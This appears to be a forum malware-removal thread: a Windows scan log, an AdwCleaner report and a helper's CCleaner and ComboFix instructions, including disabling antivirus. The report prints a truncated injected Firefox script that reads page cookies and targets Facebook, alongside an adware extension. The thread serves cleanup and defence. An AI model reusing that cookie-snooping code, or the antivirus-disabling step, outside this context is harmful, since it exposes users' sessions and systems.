AL00 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Shell = explorer.exe

AL00 x64 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Userinit = C:\Windows\system32\userinit.exe,

AL00 x64 - HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon@ Shell = explorer.exe

==================== Firefox===================================================

FF - ProfilePath -C:\Users\Jordan\AppData\Roaming\Mozilla\firefox\Profiles\aksqjff7.default

FF - Ext: [YouTube Video Downloader (Lite) 0.1.5 ] -extension - cccc5f0d-b9d0-4314-88b5-7e27551f9e84@jetpack visible: True active:True

FF - Ext: [Default 33.1 ] - theme -{972ce4c6-7e08-4474-a285-3208198ce6fd} visible: True active: True

FF - Ext: [buyNsave 3.64 ] - extension - O@bHpatKv.com visible:True active: True

FF - PlugIn: [Adobe® Flash® Player 15.0.0.239 Plugin] -C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

==================== Windows Host File=========================================

==================== BHO =======================================================

BHO - [Groove GFS Browser Helper] -{72853161-30C5-4D22-B7F9-0BBC1D38A37E} @ Default = C:\Program Files(x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

BHO - [Aanmeldhulp voor Microsoft-account] - {9030D464-4C02-4ABF-8ECC-5164760863C6}@ Default = C:\Program Files (x86)\Common Files\Microsoft Shared\WindowsLive\WindowsLiveLogin.dll

BHO x64 - [CIESpeechBHO Class] -{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} @ Default = C:\Program Files(x86)\Bluetooth Suite\IEPlugIn.dll

BHO x64 - [Windows Live ID Sign-in Helper] -{9030D464-4C02-4ABF-8ECC-5164760863C6} @ Default = C:\Program Files\CommonFiles\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

==================== Auto Start Programs =======================================

ASP01 - HKLM\..\Run @ AVG_UI = "C:\Program Files(x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ASP04 - HKCU\..\Run @ CCleaner Monitoring = "C:\ProgramFiles\CCleaner\CCleaner64.exe" /MONITOR

ASP04 - HKCU\..\Run @ SmAudio = C:\Program Files\Conexant\SmartAudio\SmAudio.exe-c

ASP04 - HKCU\..\Run @ WinPatrol = C:\Program Files(x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

ASP01 x64 - HKLM\..\Run @ AVG_UI = "C:\Program Files(x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ASP04 x64 - HKCU\..\Run @ CCleaner Monitoring ="C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR

ASP04 x64 - HKCU\..\Run @ SmAudio = C:\ProgramFiles\Conexant\SmartAudio\SmAudio.exe -c

ASP04 x64 - HKCU\..\Run @ WinPatrol = C:\Program Files(x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

ASP - Startup -C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\desktop.ini

ASP - Startup -C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\Dropbox.lnk

ASP - CommonStartup - C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup\desktop.ini

==================== Extra Items IE============================================

EI03 - Adv Opt -HKLM\..\AdvancedOptions\ACCELERATED_GRAPHICS @ Text = Accelerated graphics

EI03 - Adv Opt - HKLM\..\AdvancedOptions\ACCESSIBILITY @Text = Accessibility

EI03 - Adv Opt - HKLM\..\AdvancedOptions\BROWSE @ Text =Browsing

EI03 - Adv Opt - HKLM\..\AdvancedOptions\CRYPTO @ Text =Security

EI03 - Adv Opt - HKLM\..\AdvancedOptions\HTTP @ Text = HTTPsettings

EI03 - Adv Opt - HKLM\..\AdvancedOptions\INTERNATIONAL @Text = International

EI03 - Adv Opt - HKLM\..\AdvancedOptions\MULTIMEDIA @ Text =Multimedia

EI03 x64 - Adv Opt -HKLM\..\AdvancedOptions\ACCELERATED_GRAPHICS @ Text = Accelerated graphics

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\ACCESSIBILITY @Text = Accessibility

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\BROWSE @ Text =Browsing

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\CRYPTO @ Text =Security

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\HTTP @ Text =HTTP settings

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\INTERNATIONAL @Text = International

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\MULTIMEDIA @Text = Multimedia

==================== Internet Default Prefix ===================================

IDP00 - Default -HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix @ Default =http://

IDP01 - WWW -HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes @ WWW = http://

IDP00 x64 - Default - HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix@ Default = http://

IDP01 x64 - WWW -HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes @ WWW = http://

==================== Default Settings IE - DSIE================================

DSIE - ieuinit.inf: START_PAGE="http://go.microsoft.com/fwlink/p/?LinkId

DSIE - ieuinit.inf: SEARCH_PAGE_URL="http://go.microsoft.com/fwlink/?LinkId

==================== Protocol Hijackers - PH===================================

PH00 - Handler:grooveLocalGWS -{88FED34C-F0CA-4636-A375-3CB6248B04CD} @ = Unknown # C:\Program Files(x86)\Microsoft Office\Office12\GrooveSystemServices.dll # MD5 [d8c2b95bc2353e1f18850d6b8f5dba13]

PH00 - Handler:wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324}@ = Unknown # C:\Program Files (x86)\Windows Live\PhotoGallery\AlbumDownloadProtocolHandler.dll # MD5 [41290ae21c588291f2fc9309ad38ead5]

==================== ShellServiceObjectDelayLoad - SSODL=======================

SSODL - WebCheck = {E6FB5E20-DE35-11CF-9C87-00AA005127ED}@ =

SSODL x64 - WebCheck ={E6FB5E20-DE35-11CF-9C87-00AA005127ED} @ =

==================== Extra items - EXT(Torpig/ConduitSearch) ==================

EXT00 - HKLM\SOFTWARE\AppDataLow\Software\Adobe

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\Adobe

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\JavaSoft

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\MarkAny

EXT01 - HKCU\SOFTWARE\AppDataLow\Software\Microsoft

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\Ath_CopyHook@ {8e10a039-fe03-4f9c-b7e1-c5eeeaf53735}

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\FileSystem @{217FC9C0-3AEA-1069-A2DB-08002B30309D}= C:\Windows\system32\shell32.dll

EXT02 - HKCR\Directory\shellex\CopyHookHandlers\Sharing @{40dd6e20-7c17-11ce-a804-00aa003ca9f6}= C:\Windows\system32\ntshrui.dll

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\Adobe

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\JavaSoft

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\MarkAny

EXT01 x64 - HKCU\SOFTWARE\AppDataLow\Software\Microsoft

EXT02 x64 -HKCR\Directory\shellex\CopyHookHandlers\Ath_CopyHook @{8e10a039-fe03-4f9c-b7e1-c5eeeaf53735}= C:\Program Files (x86)\BluetoothSuite\FolderViewImpl.dll

EXT02 x64 -HKCR\Directory\shellex\CopyHookHandlers\FileSystem @ {217FC9C0-3AEA-1069-A2DB-08002B30309D}=C:\Windows\system32\shell32.dll

EXT02 x64 - HKCR\Directory\shellex\CopyHookHandlers\Sharing@ {40dd6e20-7c17-11ce-a804-00aa003ca9f6}= C:\Windows\system32\ntshrui.dll

==================== DRIVERS and SERVICES======================================

*** Win32OwnProcess ***

SERV - R2 - [AdobeARMservice] - Adobe Acrobat Update Service- c:\program files (x86)\common files\adobe\arm\1.0\armsvc.exe

SERV - R2 - [AMD External Events Utility] - AMD ExternalEvents Utility - c:\windows\system32\atiesrxx.exe

SERV - R2 - [AtherosSvc] - AtherosSvc - c:\program files(x86)\bluetooth suite\adminservice.exe

SERV - R2 - [avgwd] - AVG WatchDog - c:\program files(x86)\avg\avg2015\avgwdsvc.exe

SERV - R2 - [CronService] - Cron Service for Prey - c:\prey\platform\windows\cronsvc.exe

SERV - R2 - [CxAudMsg] - Conexant Audio Message Service -c:\windows\system32\cxaudmsg64.exe

SERV - R2 - [secunia PSI Agent] - Secunia PSI Agent -c:\program files (x86)\secunia\psi\psia.exe

SERV - R2 - [secunia Update Agent] - Secunia Update Agent -c:\program files (x86)\secunia\psi\sua.exe

SERV - R2 - [sppsvc] - Software Protection -c:\windows\system32\sppsvc.exe

SERV - R2 - [TeamViewer8] - TeamViewer 8 - c:\program files(x86)\teamviewer\version8\teamviewer_service.exe

SERV - R2 - [Virtual Router] - VirtualRouterService -c:\program files (x86)\virtual router\virtualrouterservice.exe

SERV - R2 - [wlidsvc] - Windows Live ID Sign-in Assistant -c:\program files\common files\microsoft shared\windows live\wlidsvc.exe

SERV - R2 - [WMPNetworkSvc] - Windows Media Player NetworkSharing Service - c:\program files\windows media player\wmpnetwk.exe

SERV - R2 - [WSearch] - Windows Search -c:\windows\system32\searchindexer.exe

SERV - R3 - [TrustedInstaller] - Windows Modules Installer -c:\windows\servicing\trustedinstaller.exe

SERV - S2 - [a2AntiMalware] - Emsisoft Protection Service -c:\program files (x86)\emsisoft anti-malware\a2service.exe [x]

SERV - S2 - [AVGIDSAgent] - AVGIDSAgent - c:\program files(x86)\avg\avg2015\avgidsagent.exe

SERV - S2 - [clr_optimization_v4.0.30319_32] - Microsoft.NET Framework NGEN v4.0.30319_X86 -c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe

SERV - S2 - [clr_optimization_v4.0.30319_64] - Microsoft.NET Framework NGEN v4.0.30319_X64 - c:\windows\microsoft.net\framework64\v4.0.30319\mscorsvw.exe

SERV - S2 - [gupdate] - Google Update-service (gupdate) -c:\program files (x86)\google\update\googleupdate.exe

SERV - S3 - [AdobeFlashPlayerUpdateSvc] - Adobe Flash PlayerUpdate Service - c:\windows\syswow64\macromed\flash\flashplayerupdateservice.exe

SERV - S3 - [ALG] - Application Layer Gateway Service -c:\windows\system32\alg.exe

SERV - S3 - [COMSysApp] - COM+ System Application -c:\windows\system32\dllhost.exe

SERV - S3 - [ehRecvr] - Windows Media Center ReceiverService - c:\windows\ehome\ehrecvr.exe

SERV - S3 - [ehSched] - Windows Media Center SchedulerService - c:\windows\ehome\ehsched.exe

SERV - S3 - [Fax] - Fax - c:\windows\system32\fxssvc.exe

SERV - S3 - [FontCache3.0.0.0] - Windows PresentationFoundation Font Cache 3.0.0.0 -c:\windows\microsoft.net\framework64\v3.0\wpf\presentationfontcache.exe

SERV - S3 - [gupdatem] - Google Update-service (gupdatem) -c:\program files (x86)\google\update\googleupdate.exe

SERV - S3 - [gusvc] - Google Updater Service - c:\programfiles (x86)\google\common\google updater\googleupdaterservice.exe

SERV - S3 - [iEEtwCollectorService] - Internet Explorer ETWCollector Service - c:\windows\system32\ieetwcollector.exe

SERV - S3 - [Microsoft Office Groove Audit Service] -Microsoft Office Groove Audit Service - c:\program files (x86)\microsoftoffice\office12\grooveauditservice.exe

SERV - S3 - [MozillaMaintenance] - Mozilla MaintenanceService - c:\program files (x86)\mozilla maintenance service\maintenanceservice.exe

SERV - S3 - [MSDTC] - Distributed Transaction Coordinator -c:\windows\system32\msdtc.exe

SERV - S3 - [msiserver] - Windows Installer -c:\windows\system32\msiexec.exe

SERV - S3 - [odserv] - Microsoft Office Diagnostics Service- c:\program files (x86)\common files\microsoft shared\office12\odserv.exe

SERV - S3 - [ose] - Office Source Engine - c:\program files(x86)\common files\microsoft shared\source engine\ose.exe

SERV - S3 - [PerfHost] - Performance Counter DLL Host - c:\windows\syswow64\perfhost.exe

SERV - S3 - [RpcLocator] - Remote Procedure Call (RPC)Locator - c:\windows\system32\locator.exe

SERV - S3 - [sNMPTRAP] - SNMP Trap -c:\windows\system32\snmptrap.exe

SERV - S3 - [vds] - Virtual Disk - c:\windows\system32\vds.exe

SERV - S3 - [VSS] - Volume Shadow Copy -c:\windows\system32\vssvc.exe

SERV - S3 - [WatAdminSvc] - Windows ActivationTechnologies-service - c:\windows\system32\wat\watadminsvc.exe

SERV - S3 - [wbengine] - Block Level Backup Engine Service -c:\windows\system32\wbengine.exe

SERV - S3 - [wmiApSrv] - WMI Performance Adapter -c:\windows\system32\wbem\wmiapsrv.exe

SERV - S4 - [aspnet_state] - ASP.NET-statusservice -c:\windows\microsoft.net\framework64\v4.0.30319\aspnet_state.exe

SERV - S4 - [clr_optimization_v2.0.50727_32] - Microsoft.NET Framework NGEN v2.0.50727_X86 -c:\windows\microsoft.net\framework\v2.0.50727\mscorsvw.exe

SERV - S4 - [clr_optimization_v2.0.50727_64] - Microsoft.NET Framework NGEN v2.0.50727_X64 - c:\windows\microsoft.net\framework64\v2.0.50727\mscorsvw.exe

*** Win32ShareProcess ***

SERV - R2 - [samSs] - Security Accounts Manager -c:\windows\system32\lsass.exe

SERV - R3 - [KeyIso] - CNG Key Isolation -c:\windows\system32\lsass.exe

SERV - S3 - [EFS] - Encrypting File System (EFS) -c:\windows\system32\lsass.exe

SERV - S3 - [idsvc] - Windows CardSpace -c:\windows\microsoft.net\framework64\v3.0\windows communicationfoundation\infocard.exe

SERV - S3 - [Netlogon] - Netlogon -c:\windows\system32\lsass.exe

SERV - S3 - [ProtectedStorage] - Protected Storage -c:\windows\system32\lsass.exe

SERV - S3 - [VaultSvc] - Credential Manager -c:\windows\system32\lsass.exe

SERV - S4 - [NetMsmqActivator] - Net.Msmq Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetPipeActivator] - Net.Pipe Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetTcpActivator] - Net.Tcp Listener Adapter -c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

SERV - S4 - [NetTcpPortSharing] - Net.Tcp Port SharingService - c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe

*** Others ***

SERV - R2 - [spooler] - Print Spooler -c:\windows\system32\spoolsv.exe

SERV - S3 - [uI0Detect] - Interactive Services Detection -c:\windows\system32\ui0detect.exe

*** File System Driver ***

DRV - R0 - [AVGIDSHA] - AVGIDSHA -C:\Windows\system32\Drivers\AVGIDSHA.sys

DRV - R0 - [Avgloga] - AVG Logging Driver -C:\Windows\system32\Drivers\Avgloga.sys

DRV - R0 - [Avgmfx64] - AVG Mini-Filter Resident Anti-VirusShield - C:\Windows\system32\Drivers\Avgmfx64.sys

DRV - R0 - [Avgrkx64] - AVG Anti-Rootkit Driver -C:\Windows\system32\Drivers\Avgrkx64.sys

DRV - R0 - [FileInfo] - File Information FS MiniFilter -C:\Windows\system32\Drivers\FileInfo.sys

DRV - R0 - [FltMgr] - FltMgr -C:\Windows\system32\Drivers\FltMgr.sys

DRV - R0 - [Mup] - Mup - C:\Windows\system32\Drivers\Mup.sys

DRV - R1 - [NetBIOS] - NetBIOS Interface -C:\Windows\system32\Drivers\NetBIOS.sys

DRV - R3 - [srv] - Stuurprogramma Server SMB 1.xxx -C:\Windows\system32\Drivers\srv.sys

DRV - R3 - [srv2] - Stuurprogramma Server SMB 2.xxx -C:\Windows\system32\Drivers\srv2.sys

*** Kernel Driver ***

DRV - R0 - [ACPI] - Microsoft ACPI-stuurprogramma -C:\Windows\system32\Drivers\ACPI.sys

DRV - R0 - [amd_sata] - amd_sata -C:\Windows\system32\Drivers\amd_sata.sys

DRV - R0 - [amd_xata] - amd_xata -C:\Windows\system32\Drivers\amd_xata.sys

DRV - R0 - [amdxata] - amdxata -C:\Windows\system32\Drivers\amdxata.sys

DRV - R0 - [atapi] - IDE-kanaal -C:\Windows\system32\Drivers\atapi.sys

DRV - R0 - [CLFS] - Common Log (CLFS) -C:\Windows\system32\Drivers\CLFS.sys [x]

DRV - R0 - [CNG] - CNG - C:\Windows\system32\Drivers\CNG.sys

DRV - R0 - [Compbatt] - Microsoft Composite Battery-stuurprogramma- C:\Windows\system32\Drivers\Compbatt.sys

DRV - R0 - [Disk] - Stuurprogramma voor schijfstations -C:\Windows\system32\Drivers\Disk.sys

DRV - R0 - [fvevol] - FilterstuurprogrammaBitlocker-stationsvergrendeling - C:\Windows\system32\Drivers\fvevol.sys

DRV - R0 - [hwpolicy] - Hardware Policy Driver -C:\Windows\system32\Drivers\hwpolicy.sys

DRV - R0 - [iusb3hcs] - Intel® USB 3.0hostcontrollerswitch-stuurprogramma - C:\Windows\system32\Drivers\iusb3hcs.sys

DRV - R0 - [KSecDD] - KSecDD - C:\Windows\system32\Drivers\KSecDD.sys

DRV - R0 - [KSecPkg] - KSecPkg -C:\Windows\system32\Drivers\KSecPkg.sys

DRV - R0 - [mountmgr] - Koppelpuntbeheer -C:\Windows\system32\Drivers\mountmgr.sys

DRV - R0 - [msahci] - msahci - C:\Windows\system32\Drivers\msahci.sys

DRV - R0 - [msisadrv] - msisadrv -C:\Windows\system32\Drivers\msisadrv.sys

DRV - R0 - [NDIS] - NDIS-systeemstuurprogramma -C:\Windows\system32\Drivers\NDIS.sys

DRV - R0 - [partmgr] - Partitiebeheer -C:\Windows\system32\Drivers\partmgr.sys

DRV - R0 - [pci] - PCI Bus-stuurprogramma -C:\Windows\system32\Drivers\pci.sys

DRV - R0 - [pcw] - Performance Counters for Windows Driver -C:\Windows\system32\Drivers\pcw.sys

DRV - R0 - [rdyboost] - ReadyBoost -C:\Windows\system32\Drivers\rdyboost.sys

DRV - R0 - [spldr] - Security Processor Loader Driver -C:\Windows\system32\Drivers\spldr.sys

DRV - R0 - [storflt] - Schijf - Filterstuurprogramma voorVirtual Machine-busaccelerator - C:\Windows\system32\Drivers\storflt.sys [x]

DRV - R0 - [Tcpip] - Stuurprogramma voor TCP/IP-protocol -C:\Windows\system32\Drivers\Tcpip.sys

DRV - R0 - [vdrvroot] - Microsoft Virtual DriveEnumerator-stuurprogramma - C:\Windows\system32\Drivers\vdrvroot.sys

DRV - R0 - [volmgr] - Stuurprogramma voor Volumebeheer -C:\Windows\system32\Drivers\volmgr.sys

DRV - R0 - [volmgrx] - Dynamisch Volumebeheer -C:\Windows\system32\Drivers\volmgrx.sys

DRV - R0 - [volsnap] - Opslagvolumes -C:\Windows\system32\Drivers\volsnap.sys

DRV - R0 - [Wd] - Microsoft Watchdog Timer-stuurprogramma -C:\Windows\system32\Drivers\Wd.sys

DRV - R0 - [Wdf01000] - Kernel Mode Driver Frameworksservice - C:\Windows\system32\Drivers\Wdf01000.sys

DRV - R1 - [AFD] - Ancillary Function Driver for Winsock -C:\Windows\system32\Drivers\AFD.sys

DRV - R1 - [beep] - Beep - C:\Windows\system32\Drivers\Beep.sys

DRV - R1 - [tdx] - Stuurprogramma voor ondersteuning vanNetIO Legacy TDI - C:\Windows\system32\Drivers\tdx.sys

DRV - R2 - [tcpipreg] - TCP/IP Registry Compatibility -C:\Windows\system32\Drivers\tcpipreg.sys

==================== SvcHost - White Listed====================================

All Ok

WOW - All Ok

==================== SigCheck x86 Fast=========================================

Fast Scan All ok

==================== SigCheck x64 Fast =========================================

Fast Scan All ok

==================== Job tasks=================================================

There are no .job files found.

==================== End scanning at ma 1 dec 2014 17:24 (0Min 35 Sec ) =======

# AdwCleaner v4.103 - Rapport aangemaakt 01/12/2014 op18:26:20

# Laatste Update 01/12/2014 door Xplode

# Database : 2014-12-01.2 [Live]

# Besturingssysteem : Windows 7 Ultimate Service Pack 1 (64bits)

# Gebruikersnaam : Jordan - ACER-LAPTOP

# Gestart vanuit :C:\Users\Jordan\Desktop\adwcleaner_4.103.exe

# Optie : Scannen

***** [ Services ] *****

***** [ Bestanden / Mappen ] *****

Map Gevonden :C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\Extensions\O@bHpatKv.com

***** [ Taken ] *****

***** [ Snelkoppelingen ] *****

***** [ Register ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v33.1 (x86 nl)

[aksqjff7.default] - Regel gevonden :user_pref("extensions.ZkREesY6Zt66B0Tr.scode","try{(function(){try{var url=(window.self.location.href +document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.index[...]

-\\ Comodo Dragon v

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [3373 octets] - [17/11/2013 08:53:05]

AdwCleaner[R2].txt - [2903 octets] - [30/11/2014 10:43:33]

AdwCleaner[R3].txt - [2906 octets] - [30/11/2014 10:44:10]

AdwCleaner[R4].txt - [2964 octets] - [30/11/2014 10:53:51]

AdwCleaner[R5].txt - [1523 octets] - [01/12/2014 17:06:50]

AdwCleaner[R6].txt - [1643 octets] - [01/12/2014 18:19:40]

AdwCleaner[R7].txt - [1443 octets] - [01/12/2014 18:26:20]

AdwCleaner[s0].txt - [3851 octets] - [17/11/2013 08:53:56]

AdwCleaner[s1].txt - [1601 octets] - [01/12/2014 17:13:12]

########## EOF - C:\AdwCleaner\AdwCleaner[R7].txt - [1623octets] ##########

I am not getting a log from mbam; I don't see an export button.


Could you please leave the default font size unchanged?


Download or update CCleaner.

Start CCleaner.

  • Run CCleaner and click Options in the left column.
  • Select the Advanced tab.
  • Uncheck "Only delete files in the Windows Temp system folder that are older than 24 hours".
  • Select the Settings tab.
  • Uncheck "Clean computer automatically....".
  • Click Cleaner in the left column.
  • Then click Analyze and Clean, one after the other.
  • Next, click Registry in the left column.
  • Click Scan for problems.
  • When asked whether you want to make a backup of the registry, click "Yes".
  • If errors are found, click the middle button, Fix all selected errors, and then OK.


Download Combofix to your desktop.

(So not to a download folder or temp folder.)

Additional note... Make sure your security software is disabled while you use Combofix.

This is because these scanners wrongly see certain components that Combofix uses as infected and will block Combofix.

Look here if you do not know how to disable your antivirus, firewall and/or antispyware scanner.

Close ALL windows, including your browser, and let Combofix do its work undisturbed.

So do not open any other applications until Combofix has presented the log.

If Combofix asks for an update, allow it.

When ComboFix has finished scanning, which may be after a reboot, a log file (combofix.txt) opens.

You can find it at C:\combofix.txt.

Post the Combofix log together with a new DDS log in your next reply.

* NOTE: If you get one of the messages below after using ComboFix, restart the computer.

  • Er is geprobeerd een ongeldige bewerking uit te voeren op een registersleutel die is gemarkeerd voor verwijdering.
  • Illegal operation attempted on a registry key that has been marked for deletion.
